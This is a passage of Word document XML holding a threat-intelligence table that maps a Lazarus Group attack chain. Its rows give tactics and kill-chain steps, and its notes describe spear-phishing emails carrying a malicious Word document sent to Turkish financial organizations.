      </w:tblGrid>
      <w:tr w:rsidR="00F423B5" w:rsidRPr="002D1D50" w14:paraId="4F386D0B" w14:textId="77777777" w:rsidTr="0011494A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="633565DA" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1956" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="12914985" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="002D1D50" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Chain_ID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="6ABE2750" w14:textId="36894C0C" w:rsidR="00F423B5" w:rsidRPr="002D1D50" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Lazarus_Group_00</w:t>
            </w:r>
            <w:r w:rsidR="00A26835">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="1BF72A84" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="002D1D50" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="7426C67E" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="002D1D50" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Ver</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="0E99C6FD" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="002D1D50" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="3C738B16" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="002D1D50" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="37ABA728" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="002D1D50" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F423B5" w:rsidRPr="002D1D50" w14:paraId="06D0BF3A" w14:textId="77777777" w:rsidTr="0011494A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42BC0BB9" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="002D1D50" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="431A920C" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="002D1D50" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D61A807" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="002D1D50" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5678144B" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="002D1D50" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57AF75E9" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="002D1D50" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="014B3E5F" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="002D1D50" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3EA46401" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="002D1D50" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="439D5B9F" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="002D1D50" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F423B5" w:rsidRPr="002D1D50" w14:paraId="3133B062" w14:textId="77777777" w:rsidTr="0011494A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1144CD18" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="002D1D50" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="177CCDF7" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="002D1D50" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29F631B5" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="002D1D50" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64DDB056" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="002D1D50" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Pred</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27C2CD4D" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="002D1D50" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>TInc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="774AD8B0" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="002D1D50" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>S/G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D67D05A" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="002D1D50" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>KC Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62B0BC46" w14:textId="77777777" w:rsidR="00F423B5" w:rsidRPr="002D1D50" w:rsidRDefault="00F423B5" w:rsidP="0011494A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009C146D" w:rsidRPr="00B857D7" w14:paraId="353DCC91" w14:textId="77777777" w:rsidTr="0011494A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2702691C" w14:textId="77777777" w:rsidR="009C146D" w:rsidRPr="00B857D7" w:rsidRDefault="009C146D" w:rsidP="009C146D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="228711EB" w14:textId="77777777" w:rsidR="009C146D" w:rsidRPr="00B857D7" w:rsidRDefault="009C146D" w:rsidP="009C146D">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63" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32C7276F" w14:textId="77777777" w:rsidR="009C146D" w:rsidRPr="00B857D7" w:rsidRDefault="009C146D" w:rsidP="009C146D">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3" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D40969B" w14:textId="69B290DC" w:rsidR="009C146D" w:rsidRPr="00B857D7" w:rsidRDefault="00755FD3" w:rsidP="009C146D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51DE8483" w14:textId="77777777" w:rsidR="009C146D" w:rsidRPr="00B857D7" w:rsidRDefault="009C146D" w:rsidP="009C146D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="608E6503" w14:textId="77777777" w:rsidR="009C146D" w:rsidRPr="00B857D7" w:rsidRDefault="009C146D" w:rsidP="009C146D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51C6129C" w14:textId="28E7D974" w:rsidR="009C146D" w:rsidRPr="00B857D7" w:rsidRDefault="009C146D" w:rsidP="009C146D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEL/IF-SEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36C4C171" w14:textId="77777777" w:rsidR="009C146D" w:rsidRPr="00B857D7" w:rsidRDefault="009C146D" w:rsidP="009C146D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="005E0C97">
              <w:t>Based on our analysis, financial organizations in Turkey were targeted via spear phishing emails</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009C146D" w:rsidRPr="00B857D7" w14:paraId="256EFC51" w14:textId="77777777" w:rsidTr="0011494A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EDD9937" w14:textId="77777777" w:rsidR="009C146D" w:rsidRPr="00B857D7" w:rsidRDefault="009C146D" w:rsidP="009C146D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="364B91D9" w14:textId="77777777" w:rsidR="009C146D" w:rsidRPr="00B857D7" w:rsidRDefault="009C146D" w:rsidP="009C146D">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0C26F486" w14:textId="77777777" w:rsidR="009C146D" w:rsidRPr="00B857D7" w:rsidRDefault="009C146D" w:rsidP="009C146D">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3" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D7F5F1E" w14:textId="77777777" w:rsidR="009C146D" w:rsidRPr="00B857D7" w:rsidRDefault="009C146D" w:rsidP="009C146D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A70E2B5" w14:textId="77777777" w:rsidR="009C146D" w:rsidRPr="00B857D7" w:rsidRDefault="009C146D" w:rsidP="009C146D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47B6074E" w14:textId="77777777" w:rsidR="009C146D" w:rsidRPr="00B857D7" w:rsidRDefault="009C146D" w:rsidP="009C146D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D43151A" w14:textId="618DF04F" w:rsidR="009C146D" w:rsidRPr="00B857D7" w:rsidRDefault="009C146D" w:rsidP="009C146D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-SEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="018D5127" w14:textId="77777777" w:rsidR="009C146D" w:rsidRPr="004A37AE" w:rsidRDefault="009C146D" w:rsidP="009C146D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1] C</w:t>
            </w:r>
            <w:r w:rsidRPr="005E0C97">
              <w:t>ontaining a malicious Microsoft Word document</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009C146D" w:rsidRPr="00B857D7" w14:paraId="3A9ED67C" w14:textId="77777777" w:rsidTr="0011494A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DD27D47" w14:textId="77777777" w:rsidR="009C146D" w:rsidRPr="00B857D7" w:rsidRDefault="009C146D" w:rsidP="009C146D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F1CE791" w14:textId="77777777" w:rsidR="009C146D" w:rsidRPr="00B857D7" w:rsidRDefault="009C146D" w:rsidP="009C146D">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12EC94E9" w14:textId="77777777" w:rsidR="009C146D" w:rsidRPr="00B857D7" w:rsidRDefault="009C146D" w:rsidP="009C146D">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663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="191967D1" w14:textId="77777777" w:rsidR="009C146D" w:rsidRPr="00B857D7" w:rsidRDefault="009C146D" w:rsidP="009C146D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7EB0871A" w14:textId="77777777" w:rsidR="009C146D" w:rsidRPr="00B857D7" w:rsidRDefault="009C146D" w:rsidP="009C146D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="553BE9E7" w14:textId="77777777" w:rsidR="009C146D" w:rsidRPr="00B857D7" w:rsidRDefault="009C146D" w:rsidP="009C146D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76892DB0" w14:textId="1D48F73E" w:rsidR="009C146D" w:rsidRPr="00B857D7" w:rsidRDefault="009C146D" w:rsidP="009C146D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-EXP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07AAB2ED" w14:textId="77777777" w:rsidR="009C146D" w:rsidRPr="004A37AE" w:rsidRDefault="009C146D" w:rsidP="009C146D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="009143CE">
